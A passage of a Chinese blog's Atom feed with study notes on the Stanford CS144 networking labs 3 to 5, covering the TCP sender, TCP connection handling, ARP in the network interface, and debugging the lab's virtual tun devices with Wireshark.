秒内仍然无响应，则<strong>重新发送</strong>。</li><li>当网络接口接收到一个以太网帧时，<ul><li>必须丢弃目的 MAC 地址不为当前网络接口 MAC 地址</li><li>除了 ARP 协议需要比较自己的 IP 地址以外，<strong>不要在其他任何地方进行 IP 比较</strong>，因为网络接口位于链路层。</li><li>如果是发给自己的 ARP 请求，那么要忽略掉发送来的 <strong>ARPMessage::target_ethernet_address</strong>，因为发送者自己也不知道这个要填写什么，该字段无意义。</li><li>无论接收到的是 <strong>ARP 请求包或者 ARP 响应包</strong>，只要是<strong>明确发给自己</strong>的，那么这里面的 src_ip_addr 和 src_eth_addr 都可用于更新当前的 ARP 表。</li></ul></li></ul><p>具体代码可以看这里：</p><ul><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/network_interface.cc">network_interface.cc</a></li><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/network_interface.hh">network_interface.hh</a></li></ul><p>测试结果：</p><p><img src="/2021/11/cs144-lab5/image-20211118164207822.png" alt="image-20211118164207822"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab5 的一些笔记 - &lt;strong&gt;网络接口 network interface（也被称为适配器）&lt;/strong&gt; 的实现&lt;/p&gt;
&lt;p&gt;CS144 Lab5 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab5.pdf&quot;&gt;Lab Checkpoint 5: down the stack (the network interface)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab4</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab4/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab4/</id>
    <published>2021-11-08T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.912Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab4 的一些笔记 - TCP 总实现 TCPConnection</p><p>CS144 Lab4 实验指导书 - <a href="https://cs144.github.io/assignments/lab4.pdf">Lab Checkpoint 4: the summit (TCP in full)</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">二、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab 之前需要合并一些依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab4-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="三、TCPConnection-简述">三、TCPConnection 简述</h2><p>TCPConnection 需要将 TCPSender 和 TCPReceiver 结合，实现成一个 TCP 终端，同时收发数据。</p><p>TCPConnection 有几个规则需要遵守：</p><p>对于<strong>接收数据段</strong>而言：</p><ul><li><p>如果接收到的数据包设置了 RST 标志，则将输入输出字节流全部设置为 错误 状态，并永久关闭 TCP 连接。</p></li><li><p>如果没有收到 RST 标志，则将该数据包传达给 TCPReceiver 来处理，它将对数据包中的 seqno、SYN、payload、FIN 进行处理。</p></li><li><p>如果接收到的数据包中设置了 ACK 标志，则向<strong>当前 TCPConnection</strong> 中<strong>它自己的 TCPSender</strong> 告知远程终端的 ackno 和 window_size。</p><blockquote><p>这一步相当重要，因为数据包在网络中以乱序形式发送，因此远程发送给本地的 ackno 存在滞后性。</p><p>将远程的 ackno 和 window size 附加至发送数据中可以降低这种滞后性，提高 TCP 效率。</p></blockquote></li><li><p>如果接收到的 TCP 数据包包含了一个<strong>有效 seqno</strong>，则 TCPConnection 必须至少返回一个 TCP 包作为回复，以告知远程终端 此时的 ackno 和 window size。</p></li><li><p>如果接收到的 TCP 数据包<strong>包含的 seqno 是无效</strong>的，则 TCPConnection 也需要回复一个类似的无效数据包。这是因为远程终端可能会发送无效数据包以确认当前连接是否有效，同时查看此时接收方的 ackno 和 window size。这被称为 TCP 的 <code>keep-alive</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (_receiver.<span class="built_in">ackno</span>().<span class="built_in">has_value</span>() &amp;&amp; seg.<span class="built_in">length_in_sequence_space</span>() == <span class="number">0</span> &amp;&amp; seg.<span class="built_in">header</span>().seqno == _receiver.<span class="built_in">ackno</span>().<span class="built_in">value</span>() - <span class="number">1</span>) &#123;</span><br><span class="line">  _sender.<span class="built_in">send_empty_segment</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><p>对于<strong>发送数据段</strong>来说：</p><ul><li>当 TCPSender 将一个 TCPSegment 数据包添加到待发送队列中时，TCPConnection 需要从中取出并将其发送。</li><li>在发送当前数据包之前，TCPConnection 会获取当前<strong>它自己的 TCPReceiver</strong> 的 ackno 和 window size，将其放置进待发送 TCPSegment 中，并设置其 ACK 标志。</li></ul><p>TCPConnection 需要检测时间的流逝。它存在一个 tick 函数，该函数将会被操作系统持续调用。当 TCPConnection 的 tick 函数被调用后，它需要</p><ul><li>告知 TCPSender 时间的流逝，这可能会让 TCPSender 重新发送被丢弃的数据包</li><li>如果连续重传次数超过 <code>TCPConfig::MAX RETX ATTEMPTS</code>，则发送一个 RST 包。</li><li>在条件适合的情况下关闭 TCP 连接（当处于 TCP 的 TIME_WAIT 状态时）。</li></ul><p>TCP 连接的关闭稍微麻烦一些，主要有以下几种情况需要考虑：</p><ul><li><p><strong>接收方收到 RST 标志或者发送方发送 RST 标志</strong>后，设置当前 TCPConnection 的输入输出字节流的状态为错误状态，并<strong>立即</strong>停止退出。这种属于暴力退出（unclear shutdown），可能会导致<strong>尚未传输完成的数据丢失</strong>（例如仍然在网络中运输的数据包在<strong>接收方收到RST标志后</strong>被丢弃）。</p></li><li><p>若想让双方都在数据流收发完整后退出（clear shutdonw），则情况略微麻烦一点。先上张四次挥手的图：</p><p><img src="/2021/11/cs144-lab4/image-20210515092825158.png" alt="img"></p><p>简单讲下挥手的流程：</p><ul><li><p>当<strong>客户端</strong>的数据全部发送完成，则将会发送 FIN 包以告知服务器 <strong>客户端数据全部发送完成</strong>（发送完成，不等于<strong>被接收完成</strong>）。但请注意，此时的服务器仍然可以发送数据至客户端。</p></li><li><p>当服务器对 客户端的 FIN 进行 ack 后，则说明<strong>服务器确认接收客户端的全部数据</strong>。</p></li><li><p>服务器继续发送数据，直到服务器的数据已经全部发送完成，则向客户端发送 FIN 包以告知<strong>服务端数据全部发送完成</strong>。</p></li><li><p>当客户端对服务端的 FIN <strong>发送</strong> ack 后，则说明<strong>客户端确认接收服务端的全部数据</strong>。注意，此时客户端可以确认：</p><ul><li><strong>服务端</strong>成功接收<strong>客户端</strong>全部数据</li><li><strong>客户端</strong>成功接收<strong>服务端</strong>的全部数据</li></ul><p>此时客户端可以百分百相信，<strong>此时断开连接对客户端是没有任何危害的</strong>。</p><p>但是！当服务器没接收到 客户端的 ACK 时，</p><ul><li>服务器可以确认它成功接收客户端全部数据</li><li>服务器<strong>不知道客户端是否成功接收服务端的全部数据</strong></li></ul><p>也就是说，服务器一定要获得到客户端的 ACK 才能关闭。</p><p>若服务器在超时时间内没获得到客户端的 FIN ACK，则会重发 FIN 包。但假如此时客户端已经断连，那么服务器将<strong>永远无法获取到客户端的 FIN ACK</strong>。因此即便客户端已经完成了它的所有任务，它仍然需要等待服务器端一小段时间，以便于处理服务端的 FIN 包。</p><p>当服务器获取到了客户端的 FIN_ACK 后，它就直接关闭连接。而客户端也会在超时后静默关闭。此时双方均成功获取对方的全部数据，没有造成任何危害。</p><blockquote><p>这里有个很重要的点是，<strong>TCP 不会对 ACK 包来进行 ACK</strong>。例如服务端不会对客户端发来的 FIN_ACK 回复一个 FIN_ACK_ACK。</p></blockquote></li></ul></li></ul><h2 id="四、TCP-状态图">四、TCP 状态图</h2><p>这里放两张TCP 双方的状态图，做完这些实验再去看它们就相当轻松了：</p><p><img src="/2021/11/cs144-lab4/20180328001537836.jpg" alt="这里写图片描述"></p><p><img src="/2021/11/cs144-lab4/20180328001111303.jpg" alt="这里写图片描述"></p><h2 id="五、调试">五、调试</h2><p>测试样例的调试我就不多说了，因为这部分已经在之前说了，直接用 gdb 起一个会话然后单步调试就好，比较简单。这里记录一下 CS144 模拟网卡的调试方式。</p><p>首先是启动一个 wireshark 会话抓包，这里有两种方式，一种是终端抓包：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> tshark -Pw /tmp/debug.raw -i tun144</span><br></pre></td></tr></table></figure><p>效果是这样的：</p><p><img src="/2021/11/cs144-lab4/image-20211115175444352.png" alt="image-20211115175444352"></p><p>而且抓到的数据包存放于 /tmp/debug.raw 中，也便于后期分析。</p><p>不过对我个人而言还是更喜欢图形界面，因此键入以下命令:</p><blockquote><p>注意一定要用 sudo ！不然找不到网卡。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> wireshark</span><br></pre></td></tr></table></figure><p>然后在 tun144 和 145 中随意选一个，没区别。这里我选了 tun144。</p><blockquote><p>tun144 和 145 是 CS144 模拟出的两个虚拟网卡。这两张网卡可以互通。</p></blockquote><p><img src="/2021/11/cs144-lab4/image-20211115175613525.png" alt="image-20211115175613525"></p><p>之后分别在<strong>两个</strong>终端下键入命令以相互连接</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 在 tun144 网段下启动 server 监听，其地址为 169.254.144.9:9090</span></span><br><span class="line">./apps/tcp_ipv4 -l 169.254.144.9 9090</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 在 tun145 网段下启动 client，其地址为 169.254.145.9，向 169.254.144.9:9090 发起连接</span></span><br><span class="line">./apps/tcp_ipv4 -d tun145 -a 169.254.145.9 169.254.144.9 9090</span><br></pre></td></tr></table></figure><p>之后便可以在 wireshark 中捕获其数据包来往：</p><p><img src="/2021/11/cs144-lab4/image-20211115180315678.png" alt="image-20211115180315678"></p><p>这是捕获到的错误 TCP 数据包的来往。可以发现在三次握手的时候，Server  貌似没有对 Client 返回的 ACK 进行处理，而是一直重发 SYN+ACK，最后导致重发次数过多被 Server 端挂断连接。</p><p>找到了问题便可以通过 gdb 来进行调试。不过在用 gdb 调试时，记得给 <code>./apps/tcp_ipv4</code> 设置个大一点的 <code>-t</code> 数据包超时时间参数，以避免发送方重复发送数据，扰乱捕获数据包的观察。</p><p>这个错误折腾了我一个晚上，最后发现貌似是我本机的 Tun/Tap 机制出现了问题，导致 Client 发给 Server 的数据包的 <strong>源 IP 地址不一致</strong>（看捕获到的第一行数据包 <code>169.254.144.1 -&gt; 169.254.144.9</code> 和第三行数据包 <code>169.254.145.9 -&gt; 169.254.144.9</code>）：</p><blockquote><p>Client 发送的 IP 包头为  <code>169.254.145.9 -&gt; 169.254.144.9</code>。</p></blockquote><p><img src="/2021/11/cs144-lab4/image-20211115175444352.png" alt="image-20211115175444352"></p><p>这会导致 Server 接收到 第三行 ACK 数据包时，认为该数据包不来自 Client，因此将其丢弃，一直等待 ACK 包。</p><p>一种临时解决方法是，在<code>libsponge/tcp_helpers/tcp_over_ip.cc</code>中的 <code>TCPOverIPv4Adapter::unwrap_tcp_in_ip</code> 函数中，注释掉一个 check：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">optional&lt;TCPSegment&gt; <span class="title">TCPOverIPv4Adapter::unwrap_tcp_in_ip</span><span class="params">(<span class="type">const</span> InternetDatagram &amp;ip_dgram)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// is the IPv4 datagram for us?</span></span><br><span class="line">    <span class="comment">// Note: it&#x27;s valid to bind to address &quot;0&quot; (INADDR_ANY) and reply from actual address contacted</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">not</span> <span class="built_in">listening</span>() <span class="built_in">and</span> (ip_dgram.<span class="built_in">header</span>().dst != <span class="built_in">config</span>().source.<span class="built_in">ipv4_numeric</span>())) &#123;</span><br><span class="line">        <span class="keyword">return</span> &#123;&#125;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! <span class="doctag">NOTE:</span> 注释该 check</span></span><br><span class="line">    <span class="comment">// is the IPv4 datagram from our peer?</span></span><br><span class="line">    <span class="comment">// if (not listening() and (ip_dgram.header().src != config().destination.ipv4_numeric())) &#123;</span></span><br><span class="line">    <span class="comment">//     return &#123;&#125;;</span></span><br><span class="line">    <span class="comment">// &#125;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// does the IPv4 datagram claim that its payload is a TCP segment?</span></span><br><span class="line">    <span class="keyword">if</span> (ip_dgram.<span class="built_in">header</span>().proto != IPv4Header::PROTO_TCP) &#123;</span><br><span class="line">        <span class="keyword">return</span> &#123;&#125;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这真是太折腾了…</p><h2 id="六、具体实现">六、具体实现</h2><p>该实验相当相当的费劲，原因时大量的测试样例会涉及到大量的边界检测，以及最后还会有真实网络连接下的数据包交互。TCPSender 和 TCPReceiver 必须足够鲁棒，才能降低 TCPConnection 的实现难度。</p><p>TCPConnection 必须实时根据当前的 TCP 状态来处理传入的数据包，过滤无用数据包，其实现<strong>必须假设输入的 TCPSegment 不可信任</strong>，然后利用大量的 check 来把它慢慢验证为是一个可信的 TCPSegment。</p><blockquote><p>注意：一定要防止整数溢出攻击！</p></blockquote><p>这部分实现的相关解释，我以注释的形式写入代码中，结合代码阅读方便理解。整体实现完成其实也没多少代码，因为大部分的操作都可以推迟到具体的 TCPSender、TCPReceiver 来处理（包括里面的异常处理）。</p><blockquote><p>因此这个实验非常吃前面实验实现的基础代码，非常非常的吃。</p><p>而且前面的实验可能也存在一些问题没有被测试样例给检测出来，这次将全部检测出（因为是TCP实验中最后的部分了）。</p></blockquote><p>代码位于：</p><ul><li><a href="https://github.com/Kiprey/sponge/blob/master/libsponge/tcp_connection.hh">tcp_connection.hh</a></li><li><a href="https://github.com/Kiprey/sponge/blob/master/libsponge/tcp_connection.cc">tcp_connection.cc</a></li></ul><p>测试结果：</p><p><img src="/2021/11/cs144-lab4/image-20211116090253846.png" alt="image-20211116090253846"></p><p>benchmark:</p><p><img src="/2021/11/cs144-lab4/image-20211116090556892.png" alt="image-20211116090556892"></p><p>webget 与真实服务器通信：</p><p><img src="/2021/11/cs144-lab4/image-20211116105134413.png" alt="image-20211116105134413"></p><h2 id="七、CS144-模拟网络传输逻辑">七、CS144 模拟网络传输逻辑</h2><p>CS144 中用来模拟两机网络交互的那部分代码很有意思，这里简单的研究了一下 <code>tcp_ipv4.cc</code> 中的完整逻辑。</p><p>首先，项目根路径中的 <code>tun.sh</code> 会使用 <code>ip tuntap</code> 技术创建虚拟 Tun/Tap 网络设备。这类接口仅能工作在内核中。不同于普通的网络接口，没有物理硬件。这样做的目的应该是为了模拟真实网络环境下的网络环境。</p><blockquote><p>这里是 tun/tap 的详细描述 - <a href="https://zhuanlan.zhihu.com/p/260405786">虚拟设备之TUN和TAP - 知乎</a></p></blockquote><p>当 Tun/Tap 网络设备建立好后，tcp_ipv4.cc 中会建立一个 <code>TCPOverIPv4OverTunFdAdapter</code>。<code>TunFd</code>指的是连接进 Tun 设备上的 socket，而<code>TCPOverIPv4OverTunFdAdapter</code>是一个 IP 层面的封装接口。当调用 adapter 向其写入 TCP 报文段时，它会自动 wrap 上 IP 段并传输进网络设备中；读取也是亦然，会自动解除 IP 段并返回其内部封装的 TCP报文段。</p><p>接下来，无论对于 Server 还是 Client，在三次握手之后，都会建立一个新的线程，来专门执行 <code>LossyTCPOverIPv4SpongeSocket</code> 中的 eventloop。而子线程会另起一个 eventloop 以及另外开辟两个缓冲区，用于存放用户写入的数据与即将输出至屏幕的数据。当用户通过 stdin 输入数据时， <strong>eventloop  中所注册的 poll 事件</strong>被检测到，则数据将会被写入进本地输入缓冲区中。当 <code>TCPOverIPv4OverTunFdAdapter</code> 可写时，它会将本地输入缓冲区中的数据全部写入至 <code>TCPOverIPv4OverTunFdAdapter</code> ，并最终传输至远程。</p><p>而 webget 与真实服务器通信的原理，也是通过将 IP 报文写入 tun 虚拟网络设备，将其注入进 OS 协议栈中，模拟实际的发包情况。</p><p>以下是 <code>tun.sh</code> 中创建 tun 网络设备的相关命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># start_tun 144</span></span><br><span class="line"><span class="built_in">local</span> TUNNUM=144 TUNDEV=tun144</span><br><span class="line">ip tuntap add mode tun user Kiprey name tun144</span><br><span class="line">ip addr add 169.254.144.1/24 dev tun144</span><br><span class="line">ip <span class="built_in">link</span> <span class="built_in">set</span> dev tun144 up</span><br><span class="line">ip route change 169.254.144.0/24 dev tun144 rto_min 10ms</span><br><span class="line">iptables -t nat -A PREROUTING -s 169.254.144.0/24 -j CONNMARK --set-mark 144</span><br><span class="line">iptables -t nat -A POSTROUTING -j MASQUERADE -m connmark --mark 144</span><br></pre></td></tr></table></figure><p>这是一个相当有意思的代码，有空可以读读理解理解。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者学习 CS144 计算机网络 Lab4 的一些笔记 - TCP 总实现 TCPConnection&lt;/p&gt;
&lt;p&gt;CS144 Lab4 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab4.pdf&quot;&gt;Lab Checkpoint 4: the summit (TCP in full)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144计算机网络 Lab3</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab3/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab3/</id>
    <published>2021-11-07T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.911Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了笔者学习 CS144 计算机网络 Lab3 的一些笔记 - TCP 发送方实现 TCPSender</p><p>CS144 Lab3 实验指导书 - <a href="https://cs144.github.io/assignments/lab3.pdf">Lab Checkpoint 3: the TCP sender</a></p><p>个人 CS144 实验项目地址 - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">二、环境配置</h2><p>当前我们的实验代码位于 <code>master</code> 分支，而在完成 Lab 之前需要合并一些依赖代码，因此执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab3-startercode</span><br></pre></td></tr></table></figure><p>之后重新 make 编译即可。</p><h2 id="三、TCPSender-简述">三、TCPSender 简述</h2><h3 id="1-TCPSender-功能">1. TCPSender 功能</h3><p>TCP Sender 负责将数据以 TCP 报文的形式发送，其需要完成的功能有:</p><ul><li>将 ByteStream 中的数据以 TCP 报文形式<strong>持续</strong>发送给接收者。</li><li>处理 TCPReceiver 传入的 ackno 和 window size，以追踪接收者当前的接收状态，以及检测丢包情况。</li><li>若<strong>经过一个超时时间后</strong>仍然<strong>没有接收到 TCPReceiver 发送的针对某个数据包的 ack 包</strong>，则重传对应的原始数据包。</li></ul><h3 id="2-如何检测丢包">2. 如何检测丢包</h3><p>TCP 使用<strong>超时重传机制</strong>。TCPSender 除了将原始数据流分解成众多 TCP 报文并发送以外，它还会追踪每个<strong>已发送报文</strong>（已被发送但还未被接收）的发送时间。如果某些<strong>已发送报文</strong>太久没有被接收方确认（即接收方接收到对应的 ackno），则该数据包必须<strong>重传</strong>。</p><p>需要注意的是，<strong>接收方返回的 ackno 并不一定对应着发送方返回的 seqno</strong>（也不和 seqno 有算数关系），这是因为发送的数据可能会因为内存问题，被接收方截断。</p><p>接收方确认某个报文，指的是该报文的<strong>所有字节索引</strong>都已被确认。这意味着如果该报文只有<strong>部分被确认</strong>，则不能说明该报文已被完全确认。</p><p>TCP 的超时机制比较麻烦，这是因为超时机制直接影响到应用程序从远程服务器上读取数据的响应时间，以及影响到网络拥堵的程度。以下是实现 TCPSender 时需要注意的一些点：</p><ul><li><p>每隔几毫秒，TCPSender的 tick 函数将会被调用，其参数声明了过去的时间。这是 TCPSender 唯一能调用的超时时间相关函数。因为直接调用 clock 或者 time 将会导致测试套件不可用。</p></li><li><p>TCPSender 在构造时会被给予一个<strong>重传超时时间 RTO</strong>的初始值。RTO 是在重新发送未完成 TCP 段之前需要等待的毫秒数。RTO值将会随着时间的流逝（或者更应该说是网络环境的变化）而变化，但<strong>初始的RTO</strong>将始终不变。</p></li><li><p>在 TCPSender 中，我们需要实现一个<strong>重传计时器</strong>。该计时器将会在 RTO 结束时进行一些操作。</p></li><li><p>当每次发送<strong>包含数据</strong>的数据包时，都需要启动重传计时器，并让它在 RTO 毫秒后超时。若所有<strong>发送中报文</strong>均被确认，则终止重传计时器。</p></li><li><p>如果重传计时器超时，则需要进行以下几步（稍微有点麻烦）</p><ul><li><p>重传尚未被 TCP 接收方完全确认的最早报文（即最低 ackno所对应的报文）。这一步需要我们将<strong>发送中的报文数据</strong>保存至一个新的数据结构中，这样才可以追踪正处于发送状态的数据。</p></li><li><p>如果接收者的 window size 不为 0，即可以正常接收数据，则</p><ul><li>跟踪<strong>连续重传次数</strong>。过多的重传次数可能意味着网络的中断，需要立即停止重传。</li><li>将RTO的值设置为先前的两倍，以降低较差网络环境的重传速度，以避免加深网络环境的拥堵。</li><li>重置并重启重传计时器。</li></ul><blockquote><p><strong>接收者 window size 为 0 的情况</strong>将在下面说明。</p></blockquote></li></ul></li><li><p>当接收者给发送者一个确认成功接收新数据的 ack 包时（absolute ack seqno 比之前接收到的 ackno 更大）：</p><ul><li>将 RTO 设置回初始值</li><li>如果发送方存在尚未完成的数据，则重新启动重传定时器</li><li>将<strong>连续重传计数</strong>清零。</li></ul></li></ul><h3 id="3-TCPSender-要求">3. TCPSender 要求</h3><p>在该实验中，我们需要完成 TCPSender 的以下四个接口：</p><ul><li><p><strong>fill_window</strong>：TCPSender 从 ByteStream 中读取数据，并以 TCPSegement 的形式发送，尽可能地填充接收者的<strong>窗口</strong>。但每个TCP段的大小不得超过 <code>TCPConfig::MAX PAYLOAD SIZE</code>。</p><blockquote><p>若接收方的 Windows size 为 0，则发送方将按照接收方 window size 为 1 的情况进行处理，持续发包。</p><p>因为虽然此时发送方发送的数据包可能会被接收方拒绝，但接收方可以在反向发送 ack 包时，将自己最新的 window size 返回给发送者。否则若双方停止了通信，那么当接收方的 window size 变大后，发送方仍然无法得知接收方可接受的字节数量。</p><p>若远程没有 ack 这个在 window size 为 0 的情况下发送的一字节数据包，那么发送者重传时<strong>不要将 RTO 乘2</strong>。这是因为将 RTO 双倍的目的是为了避免网络拥堵，但此时的数据包丢弃并不是因为网络拥堵的问题，而是远程放不下了。</p></blockquote></li><li><p><strong>ack_received</strong>：对接收方返回的 ackno 和 window size 进行处理。丢弃那些<strong>已经完全确认但仍然处于追踪队列</strong>的数据包。同时如果 window size 仍然存在空闲，则继续发包。</p></li><li><p><strong>tick</strong>：该函数将会被调用以指示经过的时间长度。发送方可能需要重新发送一些超时且没有被确认的数据包。</p></li><li><p><strong>send_empty_segment</strong>：生成并发送一个<strong>在 seq 空间中长度为 0</strong> 并<strong>正确设置 seqno</strong> 的 TCPSegment，这可让用户发送一个空的 ACK 段。</p></li></ul><h3 id="4-TCPSender-状态转换图">4. TCPSender 状态转换图</h3><p>我们无需定义新的状态变量，只需合理利用好各个公共接口的状态，即可快速确认当前的状态。</p><p><img src="/2021/11/cs144-lab3/image-20211109080457029.png" alt="image-20211109080457029"></p><h2 id="四、TCPSender-实现">四、TCPSender 实现</h2><p>实现起来有几个坑点：</p><ul><li><p>当 SYN 设置后，payload 应该在尽可能装的基础之上，少装入 1byte，因为这个 byte 大小被 SYN 占用。</p><p>而在 payload 尽可能装的基础上，若 FIN 装不下了，则必须在下一个包中装入 FIN 。</p></li><li><p>FIN 包的发送必须满足三个条件：</p><ul><li><strong>从来没发送过 FIN</strong>。这是为了防止发送方在发送 FIN 包并接收到 FIN ack 包之后，循环用 FIN 包填充发送窗口的情况。</li><li>输入字节流处于 EOF</li><li>window 减去 payload 大小后，仍然可以存放下 FIN</li></ul></li><li><p>当循环填充发送窗口时，若发送窗口大小足够但本地没有数据包需要发送，则必须停止发送。</p><p>若当前 Segment 是 FIN 包，则在发送完该包后，立即停止填充发送窗口。</p></li><li><p>重传定时器追踪的是发送者<strong>距离上次接收到新 ack 包</strong>的时间，而不是每个处于发送中的包的超时时间。因此除 SYN 包以外（它会启动定时器），其他发包操作将不会重置 重传定时器，同时也无需为每个数据包配备一个定时器。</p><p>同时，只有<strong>存在新数据包被接收方确认</strong>后，才会重置定时器。</p><p>tick 函数也是类似，只有存在处于发送状态的数据包时，重传定时器才起作用。若重传定时器超时，则重传的是第一个 <strong>seqno 最小且尚未重传</strong>的数据包。</p></li><li><p>当接收方的 window size 为 0 时，仍旧按照 window size 为 1 时去处理，发送一字节数据。但是，若远程没有发送 ack 包的时候，<strong>不要将 RTO 双倍</strong>，还是重置为之前的 RTO。</p></li></ul><p>以下是我的实现：</p><p>类声明：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">TCPSender</span> &#123;</span><br><span class="line">  <span class="keyword">private</span>:</span><br><span class="line">    <span class="type">int</span> _timeout&#123;<span class="number">-1</span>&#125;;</span><br><span class="line">    <span class="type">int</span> _timecount&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    std::map&lt;<span class="type">size_t</span>, TCPSegment&gt; _outgoing_map&#123;&#125;;</span><br><span class="line">    <span class="type">size_t</span> _outgoing_bytes&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> _last_window_size&#123;<span class="number">1</span>&#125;;</span><br><span class="line">    <span class="type">bool</span> _set_syn_flag&#123;<span class="literal">false</span>&#125;;</span><br><span class="line">    <span class="type">bool</span> _set_fin_flag&#123;<span class="literal">false</span>&#125;;</span><br><span class="line">    <span class="type">size_t</span> _consecutive_retransmissions_count&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! our initial sequence number, the number for our SYN.</span></span><br><span class="line">    WrappingInt32 _isn;</span><br><span class="line"></span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>类方法实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 